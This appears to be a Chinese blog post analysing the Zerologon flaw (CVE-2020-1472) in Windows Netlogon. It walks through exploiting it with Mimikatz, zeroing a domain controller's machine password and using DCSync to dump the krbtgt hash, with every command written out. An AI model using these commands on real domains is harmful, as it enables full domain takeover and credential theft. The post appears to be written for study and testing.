域提权漏洞系列分析-Zerologon漏洞分析

2020年08⽉11⽇,Windows官⽅发布了 NetLogon 特权提升漏洞的⻛险通告,该漏洞编号为CVE-2020-1472,漏 洞等级:严重,漏洞评分:10分,该漏洞也称为“Zerologon”,2020年9⽉11⽇,Secura⾼级安全专家Tom Tervoort和技术总监Ralph Moonen发表了漏洞相关的博⽂和⽩⽪书,分享了Zerologon漏洞的细节,表示攻击者 在通过NetLogon(MS-NRPC)协议与AD域控建⽴安全通道时,可利⽤该漏洞将AD域控的计算机账号密码置为 空,从⽽控制域控服务器 ,之后相关的EXP也就被开发出来了。

影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation

复制

漏洞复现 ⽅法⼀:

利⽤Mimikatz在域主机上进⾏攻击

在爆发出CVE-2020-1472漏洞后,Mimikatz在2020.09.18版本中更新了Zerologon模块,并⽀持通过Zerologon漏 洞攻击直接域控服务器,但是这种⽅法想要我们把Mimikatz等利⽤⼯具上传到域内主机中,如果域内主机存在杀 毒软件,我们还需要进⾏对Mimikatz等利⽤⼯具进⾏免杀处理,优点就是⽐较⽅便,不⽤通过代理不存在因为⽹ 络问题的未知错误。 1.通过Nslookup -type=SRV ldap.tcp命令获取域控制服务器的机器账号(如图6- 所示),⼀般来说机器账号为机 器名加上$符号组成;

图6- 获取域控制服务器的机器账号

2.利⽤Mimikatz的Zerologon模块去探测域控是否存在该漏洞,如果存在漏洞就会回显“OK,Vulnerable”,如图6- 所示;

lsadump::zerologon /target:192.168.0.111 /account:win-3o8g1o8vv2e$

复制

图6- 探测域控是否存在该漏洞

3.利⽤置零修改域控密码为空,这⼀步会把域控win-3o8g1o8vv2e(即win-3o8g1o8vv2e$⽤户)的密码置为空, hash为31d6cfe0d16ae931b73c59d7e0c089c0,回显两个OK显示成功把密码置零(如图6- 所示),因为机器⽤ 户是不可以登录系统的,但是域控的机器⽤户具备Dcsync特权,我们就可以滥⽤该特权来进⾏Dcsync攻击;

lsadump::zerologon /target:192.168.0.111 /account:win-3o8g1o8vv2e$ /exploit

复制

图6- 利⽤置零修改域控密码为空

4.Dcsync获取域管理员的Hash,这⼀步可以使⽤Mimikatz来进⾏Dcsync并获取域管理员帐户或 KRBTGT 帐户的 哈希值即可,如图6- 所示。

lsadump::dcsync /dc:win-3o8g1o8vv2e.rd.com /authuser:win-3o8g1o8vv2e$ /authdomain:rd.com /authpassword:"" /domain:rd.com /authntlm /user:krbtgt

复制

  • 22
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值